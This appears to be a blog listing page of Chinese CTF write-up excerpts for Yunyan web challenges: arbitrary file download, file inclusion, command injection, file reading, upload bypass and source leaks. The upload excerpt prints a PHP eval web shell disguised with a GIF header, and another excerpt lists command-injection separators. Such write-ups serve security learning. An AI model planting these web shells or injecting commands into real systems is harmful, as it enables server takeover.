![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
云演
http://www.yunyansec.com/#/
秋风瑟瑟...
♯‖§‖∮♯♭∮♫♭§‖♪♭♭♯♩‖♩∮§♯♬¶‖♩♪§∮‖§♪♬♭§§♪♬♭§§♩♬∮♭♭¶¶¶∮♯♭♪♯♫‖‖‖♯♬‖‖‖‖♭‖‖‖‖♬‖‖‖‖♫‖‖‖‖♯‖‖‖♫♩‖‖‖‖‖‖‖‖‖♬‖‖‖‖♯‖‖‖‖§‖‖‖♯♬§♪♯♬§♯∮§♩♬♯‖♭♪‖§♯♬♩♬§♭¶∮♫♯♪♭♯♭♯‖‖♭♩♯‖‖♯♫♯♭♫♭♬♪==
展开
-
云演-Web文件下载-writeup
听首歌吧页面里面有两个歌曲下载链接,发现下载的url是这样的download.php?url=T25lIExvdmUubXAz后面是对应文件名的base64编码,按照这个规律,下载一个download.php看看download.php?url=ZG93bmxvYWQucGhw<?phperror_reporting(0);include("hereiskey.php");$url=base64_decode($_GET[url]);if( $url=="hereiskey.ph原创 2020-06-15 11:19:33 · 585 阅读 · 0 评论 -
云演-Web文件包含-writeup
phpmyadmin页面里面有一个hint,提示flag在flag.txt里面,但是按照url里面的那种包含,也显示不了发现源码里面有一个source.php<?php class pma { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //白名原创 2020-06-15 11:05:15 · 422 阅读 · 0 评论 -
云演-Web命令执行-writeup
exec-01ping一下ip这里用管道符来命令分割没有用,测了一下,最终有用的是%0a,linux下一般的命令分隔符有这几个| || & && . ; - <> $ %0a %0d ` ls一下cat一下,得到 '', ';' => '', '|' => '', '-' => '', '$' => '', '(' => '', ')' =>原创 2020-06-14 18:52:06 · 863 阅读 · 0 评论 -
云演-Web文件读取-writeup
文件读取题目主页面是一个下载附件的链接,然而附件里面什么都没有,通过构造download.php?url=download.php下载得到download.php<?phpinclude_once ('download.class.php');$filename = $_GET['url'];$file = new Down();$downfile = $file -> downfile($filename);?>感觉有点像一个反序列化题,下载download.c原创 2020-06-14 17:35:16 · 405 阅读 · 0 评论 -
云演-Web文件上传-writeup
getshell看到这个猜到是文件包含型文件上传题了,后续操作确实也是这样,上传一个图片马,包含一下getshell,不过<?和?>被过滤了改成<script language="php"></script>绕过一下就好了upload-01说要传一个php木马,传一个php上去提示说只能传gif加一个GIF文件头,抓包改一下MIME类型上传成功,得到flagGIF89a<?php @eval($_POST['a']);?>upl原创 2020-06-14 17:13:28 · 753 阅读 · 0 评论 -
云演-Web信息篇-writeup
key在哪f12Forbidden看源码发现一段ajax请求,里面有一个/asetxted/logiinffff1111aaaaggggggg.php访问得到flag运维失误一个登陆框,题目是叫做运维失误,运维失误那就很大可能是源码泄露了,访问check.php.bak得到备份文件文件里面有用户名和密码,登录得到flagJS有一个check.js文件function Check(){t = "118,97,114,32,77,121,80,97,115,115,32,61,原创 2020-06-14 16:27:03 · 1056 阅读 · 0 评论